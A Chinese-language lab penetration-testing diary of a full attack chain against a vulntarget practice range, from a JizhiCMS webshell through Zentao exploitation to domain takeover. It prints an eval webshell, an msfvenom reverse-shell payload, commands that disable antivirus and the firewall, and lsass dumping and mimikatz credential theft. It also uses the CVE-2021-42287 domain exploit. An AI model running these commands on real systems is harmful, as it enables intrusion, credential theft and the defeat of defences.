靶机渗透日记

1. IP

   

2. 端口

   

3. 访问 80 端口

   

   访问81端口，发现是极致CMS，并且查阅资料得知存在漏洞，但是需要先进后台

   

4. 目录扫描

   

   访问 readme.txt ，发现版本为 1.8.1

   

   /admin.php 即为后台管理登录

   

   爆破用户名密码，得到admin123

   

5. 通过插件getshell

   参考：极致CMS漏洞getshell

   

   配置密码

   

   编辑index.php文件

   

   插入

   $a = $GLOBALS;
   $str = '_POST';
   eval/**nice**/(''. $a[$str]['cf87efe0c36a12aec113cd7982043573']. NULL);
   

   蚁剑连接成功getshell

   

   执行命令失败，应该是过滤了一些函数

   

   绕过 disable_functions，选择 bypass user_filter 模式

   

6. 上线MSF

   生成payload

   msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.128 lport=4456 -f elf > shell.elf
   

   

   可以看到不是最高权限，提权post/multi/recon/local_exploit_suggester

   

   使用 sudo_baron_samedit 提权

   

7. 发现存在双网卡，另一个网卡地址为 10.0.20.0

   

   添加路由，进行内网主机探测

   使用auxiliary/scanner/portscan/tcp进行扫描

   

   发现主机 10.0.20.66 开放了 8080 端口，访问发现是禅道管理系统，版本为12.4.2

   

8. 搜索 exp ，同样是需要先进到后台，这里直接使用账户 admin/Admin123 登录

   参考：禅道12.4.2后台管理员权限Getshell复现

   http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=<base64编码后的webshell路径>
   

   

   蚁剑成功连接，查看任务进程

   

   

   存在火绒以及windows defender

9. 免杀

   

10. 使用 CVE-2021-1732 提权

    exploit/windows/local/cve_2021_1732_win32k

    

    关闭防火墙

    run killav
    

    关闭休眠和防火墙

    powercfg -h off
    netsh firewall set opmode mode=disable
    

    

11. 信息收集

    

    存在域 vuntarget.com ，双网卡，并且DNS地址为10.0.10.100，可能为域控

    域用户

    

    本地用户及本地管理员

    

    补丁列表

    

    定位域控

    

    域管理员

    

12. 获取密码

    

    解密

    

    或者通过修改注册表的方式读取明文密码

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    

    当重新登录后可以读到明文密码

    

    也可以通过上传procdump然后下载lsaas文件

    procdump64.exe -accepteula -ma lsass.exe  lsass.dmp
    

    

    sekurlsa::minidump lsass.dmp
    sekurlsa::logonPasswords full
    

    

13. 使用CVE-2021-42287，拿下域控

    proxychains4 python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell